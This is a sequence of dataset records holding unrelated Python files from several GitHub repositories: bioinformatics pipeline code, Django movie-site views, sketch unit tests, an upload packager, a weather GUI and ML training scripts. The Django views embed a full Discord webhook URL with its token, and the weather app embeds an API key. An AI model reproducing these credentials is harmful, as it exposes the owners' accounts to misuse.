*htseq_args)\n htseq_outdict[condition] = htseq_outputs\n\n if stage == \"coverage\":\n logger.info(\"Calculating RNASeq metrics on %s.\" % (curr_files))\n nrun = len(curr_files)\n ref = prepare_ref_file(config[\"stage\"][stage][\"ref\"], config)\n ribo = config[\"stage\"][stage][\"ribo\"]\n picard = BroadRunner(config[\"program\"][\"picard\"])\n out_dir = os.path.join(results_dir, stage)\n safe_makedir(out_dir)\n out_files = [replace_suffix(os.path.basename(x),\n \"metrics\") for x in curr_files]\n out_files = [os.path.join(out_dir, x) for x in out_files]\n out_files = view.map(picardrun.picard_rnaseq_metrics,\n [picard] * nrun,\n curr_files,\n [ref] * nrun,\n [ribo] * nrun,\n out_files)\n\n if stage == \"rseqc\":\n _emit_stage_message(stage, curr_files)\n rseqc_config = _get_stage_config(config, stage)\n rseq_args = zip(*product(curr_files, [config]))\n view.map(rseqc.bam_stat, *rseq_args)\n view.map(rseqc.genebody_coverage, *rseq_args)\n view.map(rseqc.junction_annotation, *rseq_args)\n view.map(rseqc.junction_saturation, *rseq_args)\n RPKM_args = zip(*product(final_bamfiles, [config]))\n RPKM_count_out = view.map(rseqc.RPKM_count, *RPKM_args)\n RPKM_count_fixed = view.map(rseqc.fix_RPKM_count_file,\n RPKM_count_out)\n \"\"\"\n annotate_args = zip(*product(RPKM_count_fixed,\n [\"gene_id\"],\n [\"ensembl_gene_id\"],\n [\"human\"]))\n view.map(annotate.annotate_table_with_biomart,\n *annotate_args)\n \"\"\"\n view.map(rseqc.RPKM_saturation, *rseq_args)\n curr_files = tophat_outputs\n\n # combine htseq-count files and run deseq on them\n conditions, htseq_files = dict_to_vectors(htseq_outdict)\n deseq_config = _get_stage_config(config, \"deseq\")\n cell_types = _group_input_by_cell_type(htseq_files)\n for cell_type, files in cell_types.items():\n for comparison in deseq_config[\"comparisons\"]:\n comparison_name = \"_vs_\".join(comparison)\n deseq_dir = os.path.join(results_dir, \"deseq\", cell_type,\n comparison_name)\n safe_makedir(deseq_dir)\n 
out_file = os.path.join(deseq_dir, comparison_name + \".counts.txt\")\n            files_by_condition = _group_input_by_condition(files)\n            _emit_stage_message(\"deseq\", files_by_condition)\n            c, f = dict_to_vectors(files_by_condition)\n            combined_out = htseq_count.combine_counts(f,\n                                                      None,\n                                                      out_file)\n            deseq_out = os.path.join(deseq_dir, comparison_name)\n            logger.info(\"Running deseq on %s with conditions %s \"\n                        \"and writing to %s\" % (combined_out,\n                                               conditions,\n                                               deseq_out))\n            deseq_out = view.map(deseq.run, [combined_out], [c], [deseq_out])\n            annotate.annotate_table_with_biomart(deseq_out[0],\n                                                 \"id\",\n                                                 \"ensembl_gene_id\",\n                                                 \"human\")\n            #annotated_file = view.map(annotate.annotate_table_with_biomart,\n            #                          [deseq_out],\n            #                          [\"id\"],\n            #                          [\"ensembl_gene_id\"],\n            #                          [\"human\"])\n\n    # end gracefully\n    stop_cluster()\n\n\nif __name__ == \"__main__\":\n    # read in the config file and perform initial setup\n    main_config_file = sys.argv[1]\n    with open(main_config_file) as config_in_handle:\n        startup_config = yaml.load(config_in_handle)\n    setup_logging(startup_config)\n    start_cluster(startup_config)\n    from bipy.cluster import view\n\n    main(main_config_file)\n","repo_name":"parveezsha/gitlabjuly","sub_path":"projects/lu_rnaseq/scripts/lu_pipeline.py","file_name":"lu_pipeline.py","file_ext":"py","file_size_in_byte":10562,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"10210255766","text":"from django.shortcuts import render\nfrom django.template.response import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom apigetmovie.api.request_api import RandomFilm\nfrom django.http import QueryDict\nfrom json import dumps\nfrom .models import Fav, UserFav\nfrom urllib.parse import parse_qs\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nfrom django.core.mail import send_mail\n\ndef index(request, id=-1):\n    if request.method == 'POST':\n        response_ajax = request.read().decode(\"UTF-8\")\n        type_request = QueryDict(response_ajax).get('random')\n        type_ = QueryDict(response_ajax).get('type')\n        film = RandomFilm(type_)\n\n        if type_request == 'false':\n            res = film.get_film_for_id(id)\n\n        else:\n            res = film.get_film()\n\n        if res is False:\n            return HttpResponse(dumps({'error_api': 'Извините, но произошла неизвестная ошибка. 
Попробуйте еще раз'}))\n\n # проверяем есть ли фильм в избранном\n if request.user.is_authenticated:\n if type_request != \"false\":\n id = res['id']\n\n userid = User.objects.get(username=request.user.username).id\n if UserFav.objects.filter(userid=userid, favid=id).count() == 0:\n res.update({\"is_favorite\": False})\n else:\n res.update({\"is_favorite\": True})\n\n res.update({\"error_api\": \"\"})\n\n return HttpResponse(dumps(res))\n\n return render(request, 'index.html')\n\n\ndef signup(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n if request.method == 'POST':\n errors = []\n response_ajax = parse_qs(request.read().decode(\"UTF-8\"))\n username = response_ajax['username'][0]\n email = response_ajax['email'][0]\n password = response_ajax['password'][0]\n password_repeat = response_ajax['password-repeat'][0]\n\n exist_email = User.objects.filter(email=email).count()\n if exist_email > 0:\n errors.append({'input': 'email','text': 'Данный email уже используется'})\n\n exist_username = User.objects.filter(username=username).count()\n\n if exist_username > 0:\n errors.append({'input': 'username','text': 'Пользователь с таким именем уже существует'})\n\n if password != password_repeat:\n errors.append({'input': 'password','text': 'Пароли не совпадают'})\n\n if errors != []:\n res = dumps({'signup': False, 'errors': errors})\n return HttpResponse(res)\n\n user = User.objects.create_user(username, email, password)\n user.save()\n\n user = authenticate(request, username=username, password=password)\n login(request, user)\n result = get_list_favorite(username)\n result.update({'login': True, 'signup': True})\n\n webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/726552664934187049/Ywj3iwcGtVPvNnuuCzfJY9xW0IhGt7y_oKUXXkWClR5bwShifYjjQrKXuUSA9z23cBRf')\n embed = DiscordEmbed(title='+1 Пользователь - ' + username, description='Email: ' + email, color=242424)\n # add embed object to webhook\n webhook.add_embed(embed)\n\n webhook_response = webhook.execute()\n\n return HttpResponse(dumps(result))\n\n return HttpResponseRedirect('/')\n\n\ndef logout_(request):\n logout(request)\n return HttpResponseRedirect('/')\n\n\ndef login_(request):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n if request.method == 'POST':\n response_ajax = parse_qs(request.read().decode(\"UTF-8\"))\n username = response_ajax['username'][0]\n password = response_ajax['password'][0]\n\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n result = get_list_favorite(username)\n result.update({'login': True})\n return HttpResponse(dumps(result))\n else:\n return HttpResponse(dumps({'login': False}))\n\n return HttpResponseRedirect('/')\n\n\ndef get_user(request):\n if request.user.is_authenticated:\n username = request.user.username\n result = get_list_favorite(username)\n result.update({'username': username, })\n return HttpResponse(dumps(result))\n\n return HttpResponse(dumps({'username': False}))\n\n\ndef add_fav(request):\n\n if not request.user.is_authenticated:\n return HttpResponse(dumps({'fav_add': False, \"authenticated\": False}))\n\n if request.method == \"POST\":\n response_ajax = request.read().decode(\"UTF-8\")\n id = QueryDict(response_ajax).get('filmId')\n type_ = QueryDict(response_ajax).get('type')\n userid = User.objects.get(username=request.user.username).id\n\n favid_or_not = Fav.objects.filter(favid=id).count()\n\n if favid_or_not == 0:\n Fav.objects.create(favid=id, 
type=type_)\n\n        obj_ = UserFav.objects.filter(favid=id, userid=userid).count()\n\n        if obj_ == 0:\n            UserFav.objects.create(userid=userid, favid=id)\n            result = get_list_favorite(request.user.username)\n            result.update({'fav_add': True, \"authenticated\": True})\n\n            return HttpResponse(dumps(result))\n        return HttpResponse(dumps({'fav_add': False, \"authenticated\": True}))\n\n    return HttpResponseRedirect('/')\n\n\ndef remove_fav(request):\n    if request.method == \"POST\":\n\n        if not request.user.is_authenticated:\n            return HttpResponse(dumps({'fav_remove': False, \"authenticated\": False}))\n\n        response_ajax = request.read().decode(\"UTF-8\")\n        id = QueryDict(response_ajax).get('filmId')\n        userid = User.objects.get(username=request.user.username).id\n        id_favorite_of_user = UserFav.objects.filter(favid=id, userid=userid)\n        exist_id_favorite_of_user = id_favorite_of_user.count()\n\n        if exist_id_favorite_of_user == 0:\n            return HttpResponse(dumps({\"error\": \"film not added to favorites list\"}))\n\n        if id_favorite_of_user.delete():\n            result = get_list_favorite(request.user.username)\n            result.update({'error': False, })\n            return HttpResponse(dumps(result))\n\n    return HttpResponseRedirect('/')\n\n\ndef get_favs(request):\n\n    if not request.user.is_authenticated:\n        return HttpResponse(dumps({\"authenticated\": False}))\n\n    if request.method == \"POST\":\n        result = get_list_favorite(request.user.username)\n        return HttpResponse(dumps(result))\n\n    return HttpResponseRedirect('/')\n\n\ndef get_list_favorite(username):\n    userid = User.objects.get(username=username).id\n    list_id = UserFav.objects.filter(userid=userid)\n    result = []\n    i = 1\n\n    for id in list_id.all():\n        type_ = Fav.objects.get(favid=id.get_favid()).get_type()\n        film = RandomFilm(type_).get_film_for_id(id.get_favid())\n\n        res = {\"id\": id.get_favid(), \"type\": type_, \"poster_path\": film[\"poster_path\"], \"title\": film[\"title\"], 'backdrop_path': film['backdrop_path'], 'genres': film['genres']}\n        result.append(res)\n        i += 1\n    result = {\"favorites\": result, \"username\": username}\n    return result\n\n\ndef feedback(request):\n    if request.method == 'POST':\n        response_ajax = request.read().decode(\"UTF-8\")\n        text = QueryDict(response_ajax).get('text')\n        name = QueryDict(response_ajax).get('name')\n        send_mail(name, text, 'mittle.group@mittle.jetmovie.ru', ['mittle.studio@gmail.com'], fail_silently=False)\n        webhook = DiscordWebhook(url='https://discordapp.com/api/webhooks/726552664934187049/Ywj3iwcGtVPvNnuuCzfJY9xW0IhGt7y_oKUXXkWClR5bwShifYjjQrKXuUSA9z23cBRf')\n\n        embed = DiscordEmbed(title='Новое сообщение от ' + name, description='Текст: ' + text, color=242424)\n\n        webhook.add_embed(embed)\n\n        webhook_response = webhook.execute()\n        return HttpResponse(dumps({'send': True,}))\n    return HttpResponseRedirect('/')\n","repo_name":"Morozh/JetMovie","sub_path":"apigetmovie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"24018875894","text":"import unittest\nimport logging\nimport time\n\nimport graphsignal\nfrom graphsignal.sketches.kll import KLLSketch\nfrom graphsignal import metrics_pb2\n\nlogger = logging.getLogger('graphsignal')\n\n\nclass KLLSketchTest(unittest.TestCase):\n    def setUp(self):\n        self.maxDiff = None\n\n    def test_kll_update(self):\n        k1 = KLLSketch()\n        k1.update(1)\n        k1.update(2)\n        k1.update(2)\n        k1.update(3.333)\n        k1.update(1000)\n        k1.update(0.0001)\n        self.assertEqual(k1.count(), 6)\n        self.assertEqual(\n            
k1.ranks(), [\n (0.0001, 1), (1, 2), (2, 3), (2, 4), (3.333, 5), (1000, 6)])\n self.assertEqual(k1.cdf(), [(0.0001, 0.16666666666666666), (1, 0.3333333333333333), (\n 2, 0.5), (2, 0.6666666666666666), (3.333, 0.8333333333333334), (1000, 1.0)])\n\n def test_kll_update_str(self):\n k1 = KLLSketch()\n k1.update('1')\n k1.update('2')\n k1.update('2')\n k1.update('3')\n self.assertEqual(k1.count(), 4)\n self.assertEqual(k1.ranks(), [('1', 1), ('2', 2), ('2', 3), ('3', 4)])\n self.assertEqual(\n k1.cdf(), [\n ('1', 0.25), ('2', 0.5), ('2', 0.75), ('3', 1.0)])\n\n def test_kll_merge(self):\n k1 = KLLSketch()\n\n k2 = KLLSketch()\n k2.update(1)\n k2.update(2)\n k1.merge(k2)\n\n k3 = KLLSketch()\n k3.update(1)\n k3.update(2)\n k3.update(12)\n k1.merge(k3)\n\n self.assertEqual(\n k1.cdf(), [\n (1, 0.2), (1, 0.4), (2, 0.6), (2, 0.8), (12, 1.0)])\n\n def test_kll_distribution(self):\n k1 = KLLSketch()\n for i in range(5):\n k1.update(1)\n k1.update(2)\n for i in range(100):\n k1.update(4)\n\n self.assertEqual(k1.distribution(), [[1, 5], [2, 1], [4, 100]])\n\n def test_kll_proto(self):\n k1 = KLLSketch()\n k1.update(1)\n k1.update(2)\n k1.update(3)\n\n window = metrics_pb2.PredictionWindow()\n proto = window.data_streams['1'].metrics['1'].distribution_value.sketch_kll10\n\n k1.to_proto(proto)\n\n self.assertEqual(proto.item_type, proto.ItemType.DOUBLE)\n\n k2 = KLLSketch()\n k2.from_proto(proto)\n\n self.assertEqual(k2._k, k1._k)\n self.assertEqual(k2._c, k1._c)\n self.assertEqual(k2._H, k1._H)\n self.assertEqual(k2._size, k1._size)\n self.assertEqual(k2._max_size, k1._max_size)\n self.assertEqual(k2.count(), k1.count())\n self.assertEqual(k2.ranks(), k1.ranks())\n self.assertEqual(k2.cdf(), k1.cdf())\n\n def test_kll_update_perf(self):\n s = KLLSketch()\n\n start = time.time()\n\n #import cProfile\n #from pstats import Stats, SortKey\n\n # with cProfile.Profile() as pr:\n for i in range(1000):\n s.update(i)\n\n #stats = Stats(pr)\n # stats.sort_stats(SortKey.CUMULATIVE).print_stats(25)\n\n took = time.time() - start\n print('KLL update (1000) took: ', took)\n #print('CDF', s.cdf())\n self.assertTrue(took < 1)\n\n def test_kll_merge_perf(self):\n import random\n sketches = []\n for i in range(1000):\n s = KLLSketch()\n s.update(random.randint(1, 100))\n sketches.append(s)\n\n start = time.time()\n\n ns = KLLSketch()\n for s in sketches:\n ns.merge(s)\n\n took = time.time() - start\n print('kll merge (1000) took: ', time.time() - start)\n #print('kll size: ', len(ns.serialize()))\n self.assertTrue(took < 1)\n","repo_name":"syllogy/graphsignal","sub_path":"graphsignal/sketches/kll_test.py","file_name":"kll_test.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"17210324587","text":"#!/usr/bin/python3\n\nimport argparse\nimport re\nimport os\nimport os.path\nimport md5\nimport sys\nimport zipfile\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Create a PositioNZ-PP station coordinate model upload file\"\n )\n parser.add_argument(\"zip_file\", help=\"Name of zip file to create\")\n parser.add_argument(\n \"spm_xml_file\",\n nargs=\"*\",\n help=\"Station prediction model XML files to upload CCCC.xml\",\n )\n parser.add_argument(\n \"-s\", \"--stn-dir\", help=\"Directory containing station coordinate XML files\"\n )\n parser.add_argument(\n \"-r\",\n \"--remove-file\",\n nargs=\"*\",\n help=\"The station code of files to remove from positionzpp\",\n )\n parser.add_argument(\n \"-o\",\n 
\"--overwrite\",\n action=\"store_true\",\n help=\"Allow overwriting an existing zip file\",\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Be verbose!\")\n\n args = parser.parse_args()\n verbose = args.verbose\n\n upload_key = \"GNSSSPM\"\n filere = re.compile(r\"^(\\w{4})\\.xml$\")\n\n if os.path.exists(args.zip_file) and not args.overwrite:\n print(\"Use -o to overwrite existing zip file \" + args.zip_file)\n sys.exit()\n\n codes = []\n files = []\n spmhash = \"\"\n spmdir = args.stn_dir or \".\"\n\n xmlfiles = list(args.spm_xml_file)\n if len(xmlfiles) == 0:\n xmlfiles = [f for f in os.listdir(spmdir) if filere.match(f)]\n\n for sfile in xmlfiles:\n if not sfile.endswith(\".xml\"):\n sfile = sfile + \".xml\"\n source = os.path.join(spmdir, sfile)\n if not os.path.exists(source):\n source = sfile\n if not os.path.exists(source):\n print(sfile, \"does not exist!\")\n continue\n filename = os.path.basename(source)\n match = filere.match(filename)\n if not match:\n print(sfile, \" is not a valid filename for a station prediction model\")\n continue\n code = match.group(1).upper()\n if verbose:\n print(\"Adding model for {0} from {1}\".format(code, source))\n codes.append(code)\n with open(source) as sf:\n data = sf.read()\n m = md5.new()\n m.update(upload_key)\n m.update(data)\n spmhash = spmhash + code + \".xml \" + m.hexdigest() + \"\\n\"\n files.append({\"file\": code + \".xml\", \"data\": data})\n\n remove_files = args.remove_file or []\n for rcode in remove_files:\n if not re.match(r\"^\\w{4}$\", rcode):\n print(\"Invalid code\".rcode, \" for removal\")\n continue\n rcode = rcode.upper()\n if rcode in codes:\n print(\"Cannot remove {0} as already used\".format(rcode))\n continue\n m = md5.new()\n m.update(upload_key)\n m.update(\"REMOVE\")\n m.update(rcode)\n m.update(\".xml\")\n spmhash = spmhash + rcode + \".xml \" + m.hexdigest() + \"\\n\"\n if verbose:\n print(\"Removing file \" + rcode)\n\n zipfilename = args.zip_file\n if not zipfilename.endswith(\".zip\"):\n zipfilename = zipfilename + \".zip\"\n zip = zipfile.ZipFile(zipfilename, \"w\", zipfile.ZIP_DEFLATED)\n zip.writestr(\"spm.hash\", spmhash)\n for f in files:\n zip.writestr(f[\"file\"], f[\"data\"])\n zip.close()\n if verbose:\n print(\"Zip file {0} ready for upload to PositioNZ-PP\".format(zipfilename))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"linz/python-linz-stationcoordmodel","sub_path":"LINZ/positionzpp_spm_upload.py","file_name":"positionzpp_spm_upload.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38736686345","text":"from turtle import width\nfrom geopy.geocoders import Nominatim\nimport requests\nfrom datetime import datetime\nimport PySimpleGUI as sg\n\nclass Tela:\n def __init__(self):\n sg.theme('Reddit')\n\n lado_a = [\n [sg.Text('Cidade:', size=(10,1), font='Arial 12' ), sg.Input(key='cidade', size=(45,5), font='Arial 12'), sg.Button('Pesquisar', size=(10,1))], \n [sg.Text('Temperatura:',size=(10,1), font='Arial 12'), sg.Text(key='temp', size=(20,1), font='Arial 12')], \n [sg.Text('Mínima:',size=(10,1), font='Arial 12'), sg.Text(key='minima', size=(20,1), font='Arial 12')],\n [sg.Text('Máxima:',size=(10,1), font='Arial 12'), sg.Text(key='maxima', size=(20,1), font='Arial 12')],\n [sg.Text('Situação:',size=(10,1), font='Arial 12'), sg.Text(key='descricao', size=(20,1), font='Arial 12')],\n [sg.Text('Data/Hora:',size=(10,1), font='Arial 12'), 
sg.Text(key='data_hora', size=(20,1), font='Arial 12')],\n [sg.Text('Localização:',size=(10,1), font='Arial 12'), sg.Text(key='location', size=(50,3), font='Arial 12')] \n ]\n\n lado_b = [\n [sg.Image(source='logo.png')] \n ]\n\n layout = [\n [\n sg.Column(lado_a),\n sg.VSeparator(),\n sg.Column(lado_b)\n ]\n ]\n\n self.janela = sg.Window('Previsão do Tempo', layout)\n\n def Iniciar(self):\n\n while True:\n self.event, self.values = self.janela.Read()\n\n\n if self.event == sg.WINDOW_CLOSED:\n break\n if self.event == 'Pesquisar': \n\n try:\n #obtendo a latitude e longitude\n\n cidade = self.values['cidade']\n\n geolocator = Nominatim(user_agent=\"main\")\n location = geolocator.geocode(cidade)\n lon = location.longitude\n lat = location.latitude\n\n #fazendo a requisição da API\n key = '8cef1367f56402ade307b1eb06187765'\n \n request = requests.get('http://api.openweathermap.org/data/2.5/weather?lat={}&lon={}&lang=pt_br&appid={}'.format(lat,lon, key))\n tempo = request.json() \n\n self.janela['temp'].update(\"{:.1f} º Celsius\".format(tempo['main']['temp'] - 273.15))\n self.janela['minima'].update(\"{:.1f} º Celsius\".format(tempo['main']['temp_min'] - 273.15))\n self.janela['maxima'].update(\"{:.1f} º Celsius\".format(tempo['main']['temp_max'] - 273.15))\n self.janela['data_hora'].update(datetime.today().strftime('%d-%m-%Y - %H:%M'))\n self.janela['descricao'].update(tempo['weather'][0]['description'])\n self.janela['location'].update(location)\n except:\n self.janela['cidade'].update('Cidade não encontrada. Favor digitar novamente.')\n self.janela['temp'].update('')\n self.janela['minima'].update('')\n self.janela['maxima'].update('')\n self.janela['data_hora'].update('')\n self.janela['descricao'].update('')\n self.janela['location'].update('')\n\ntela = Tela()\ntela.Iniciar()","repo_name":"jnascimentocode/previsao_tempo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34776557203","text":"import sys\nsys.path.append(r'/home/elhanani/study/huji-deep/install')\nimport simnets.keras as sk\nimport keras\nfrom keras.datasets import mnist\nfrom keras.callbacks import TensorBoard\nfrom keras.models import Sequential, Model\nfrom keras.layers import add, RepeatVector, Input, Dense, Flatten, GlobalAveragePooling2D, Activation, Reshape, Conv2D, AveragePooling2D, BatchNormalization, Lambda, ZeroPadding2D\nfrom keras import backend as K\nimport tensorflow as tf\nimport numpy as np\nnp.random.seed(1)\n#with tf.device('/cpu:0'):\nif True:\n batch_size = 64\n num_classes = 10\n sim_kernel = 2\n sim_channels = 32\n mex_channels = sim_channels\n epochs = 30\n\n # input image dimensions\n img_rows, img_cols = 28, 28\n\n # the data, shuffled and split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n\n assert(K.image_data_format() == 'channels_first')\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n print(x_train.mean(), x_train.min(), x_train.max())\n x_train = x_train / 255.0 - 0.5\n x_test = x_test / 255.0 - 0.5\n\n # ============\n N = 500\n x_test = x_test[:N]\n y_test = y_test[:N]\n x_train = x_train[:N*10]\n y_train = y_train[:N*10]\n # ============\n\n print(x_train.mean(), x_train.min(), x_train.max())\n\n 
print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n USE_PRETRAINED = False\n weights = np.load('/home/elhanani/notebooks/weights.npy')[()]\n\n # def norm_layer(x):\n # norm = sk.Mex(1, blocks=[int(x.shape[-3]), 1, 1],\n # softmax_mode=True, normalize_offsets=False,\n # use_unshared_regions=False, shared_offset_region=[-1],\n # offsets_initializer='zeros',\n # trainable=False)(x)\n # tile = Reshape((int(x.shape[-2]) * int(x.shape[-1]),))(norm)\n # tile = RepeatVector(int(x.shape[-3]))(tile)\n # tile = Reshape(x._keras_shape[-3:])(tile)\n # tile = Lambda(lambda x: -x)(tile)\n # normalized = add([x, tile])\n # return normalized, norm\n\n def sum_pooling_layer(x, pool_size):\n # Average pooling doesn't take padding area into consideration when using padding='same'\n # If we wish to add padding, we must do so externally with ZeroPadding2D so we would\n # be able to compute the sum pooling layer from the average pooling layer.\n x = AveragePooling2D(pool_size=pool_size, padding='valid')(x)\n x = Lambda(lambda x: x * pool_size[0] * pool_size[1])(x)\n return x\n\n\n def fixed_dirichlet_init(shape, dtype=None):\n if dtype is None:\n dtype = K.floatx()\n num_regions, num_instances, block_c, block_h, block_w = shape\n k = block_c * block_h * block_w\n # when given s as a size argument dirichlet function return an array with shape s + [k]\n # then we reshape the output to be of the same shape as the variable\n init_np = np.random.dirichlet([1] * k, size=(num_regions, num_instances)).astype(dtype)\n init_np = np.log(init_np)\n init_np = init_np.reshape(shape)\n return tf.constant(init_np)\n\n a = Input(shape=(1, img_rows, img_cols))\n if USE_PRETRAINED:\n templates_initializer= tf.constant_initializer(weights['sim_templates'])\n weights_initializer= tf.constant_initializer(weights['sim_weights'])\n else:\n templates_initializer = 'random_normal'\n weights_initializer = keras.initializers.constant(100)\n b = sk.Similarity(sim_channels,\n blocks=[2, 2], strides=[2, 2], similarity_function='L2',\n normalization_term=True, padding=[2, 2], out_of_bounds_value=np.nan, ignore_nan_input=True,\n normalization_term_fudge=1e-4,\n templates_initializer=templates_initializer,\n weights_initializer=weights_initializer)(a)\n i = 0\n # last_norm=None\n while b.shape[-2:] != (1, 1):\n mex_channels *= 2\n unshared = 2 #if i < 1 else int(b.shape[-2])\n #b, b_norm = norm_layer(b)\n b = sk.Mex(mex_channels,\n blocks=[int(b.shape[-3]), 1, 1], strides=[int(b.shape[-3]), 1, 1],\n softmax_mode=True, normalize_offsets=True,\n use_unshared_regions=True, unshared_offset_region=[unshared],\n offsets_initializer='dirichlet')(b)\n b = sum_pooling_layer(b, pool_size=(2, 2))\n # b_norm = sum_pooling_layer(b_norm, pool_size=(2, 2))\n # if last_norm is None:\n # last_norm = b_norm\n # else:\n # last_norm = sum_pooling_layer(last_norm, pool_size=(2, 2))\n # last_norm = add([last_norm, b_norm])\n i += 1\n #b, b_norm = norm_layer(b)\n tf.set_random_seed(1)\n b = sk.Mex(num_classes,\n blocks=[mex_channels, 1, 1], strides=[mex_channels, 1, 1],\n softmax_mode=True, normalize_offsets=True,\n use_unshared_regions=True, shared_offset_region=[1],\n offsets_initializer='dirichlet')(b)\n b = Flatten()(b)\n model = Model(inputs=[a], outputs=[b])\n\n print(model.summary())\n\n def softmax_loss(y_true, 
y_pred):\n return K.categorical_crossentropy(y_pred, y_true, True)\n\n model.compile(loss=softmax_loss,\n optimizer=keras.optimizers.nadam(lr=1e-2, epsilon=1e-6),\n metrics=['accuracy'])#,\n callbacks=[TensorBoard(log_dir='log', histogram_freq=1, write_graph=True, write_images=False,\n write_grads=True)]\n\n #sk.perform_unsupervised_init(model, 'kmeans', layers=None, data=x_train, batch_size=100)\n keras.models.save_model(model, '/home/elhanani/tmp/model.hd5')\n model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test),\n callbacks=callbacks)\n\n score = model.evaluate(x_test, y_test, verbose=0)\n print('Test loss:', score[0])\n print('Test accuracy:', score[1])","repo_name":"HUJI-Deep/simnets-tf","sub_path":"test/basic_net_with_keras.py","file_name":"basic_net_with_keras.py","file_ext":"py","file_size_in_byte":6476,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"22278201190","text":"import pyrootutils\nroot = pyrootutils.setup_root(\n search_from=__file__,\n indicator=[\".git\", \"pyproject.toml\"],\n pythonpath=True,\n dotenv=True,\n)\n\nfrom pathlib import Path\nimport pytorch_lightning as pl\nfrom pytorch_lightning import Trainer\nimport hydra\nfrom omegaconf import DictConfig\nimport time\nfrom modelmodule import TextClassifierModel\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom utils import get_pylogger, instantiate_loggers, close_loggers, log_hyperparameters\nfrom pytorch_lightning.loggers import WandbLogger\n\nlog = get_pylogger(__name__)\n\n\ndef train(cfg: DictConfig):\n t0 = time.time()\n pl.seed_everything(cfg.seed)\n\n # Load datasets\n t1 = time.time()\n dm = hydra.utils.instantiate(cfg.datamodule)\n dm.prepare_data()\n dm.setup(\"fit\")\n log.info(\"Finish load datasets in {:.2f} sec\".format(time.time() - t1))\n\n # Load model\n net = hydra.utils.instantiate(cfg.net, num_classes=dm.num_classes)\n lit_model = TextClassifierModel(net, cfg.learning_rate, num_classes=dm.num_classes)\n\n # Initialize trainer\n best_checkpoint_callback = ModelCheckpoint(\n save_top_k= cfg.trainer.max_epochs, # avoid -1 value to work with wandb logger\n monitor=\"val_acc\",\n mode=\"max\",\n dirpath=Path(cfg.paths.output_dir) / \"checkpoints\",\n filename=\"{epoch:02d}_{val_acc:.4f}\",\n save_weights_only=True,\n )\n last_checkpoint_callback = ModelCheckpoint(\n save_last=False,\n dirpath=Path(cfg.paths.output_dir) / \"checkpoints\",\n filename=\"last_{epoch:02d}_{val_acc:.4f}\",\n )\n setattr(last_checkpoint_callback, \"avail_to_wandb\", False)\n\n log.info(\"Instantiating loggers...\")\n logger = instantiate_loggers(cfg.get(\"logger\"))\n\n log.info(f\"Instantiating trainer <{cfg.trainer._target_}>\")\n trainer: Trainer = hydra.utils.instantiate(\n cfg.trainer,\n callbacks=[last_checkpoint_callback, best_checkpoint_callback],\n logger=logger,\n )\n\n object_dict = {\n \"cfg\": cfg,\n \"datamodule\": dm,\n \"model\": lit_model,\n # \"callbacks\": ,\n \"logger\": logger,\n \"trainer\": trainer,\n }\n\n if logger:\n log.info(\"Logging hyperparameters!\")\n log_hyperparameters(object_dict)\n\n if cfg.get(\"train\"):\n log.info(\"Starting training!\")\n trainer.fit(model=lit_model, datamodule=dm, ckpt_path=cfg.get(\"ckpt_path\"))\n\n # We have problems with testing in ddp settings\n # if cfg.get(\"test\"):\n # log.info(\"Starting testing!\")\n # ckpt_path = best_checkpoint_callback.best_model_path\n # if ckpt_path == \"\":\n # log.warning(\"Best ckpt not found! 
Using current weights for testing...\")\n    #         ckpt_path = None\n    #     trainer.test(model=lit_model, datamodule=dm, ckpt_path=ckpt_path)\n    #     log.info(f\"Best ckpt path: {ckpt_path}\")\n\n    log.info(\n        \"Finish in {:.2f} sec. out_dir={}\".format(\n            time.time() - t0, cfg.paths.output_dir\n        )\n    )\n    close_loggers()\n\n\n@hydra.main(config_path=\"configs\", config_name=\"train\", version_base=None)\ndef main(cfg):\n    train(cfg)\n\n\nif __name__ == \"__main__\":\n    from pyrootutils import setup_root\n\n    root = setup_root(\n        __file__, indicator=[\".git\"], dotenv=True, pythonpath=True, cwd=False\n    )\n    main()\n","repo_name":"NNHieu/Influence-Functions","sub_path":"sequence_problems/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
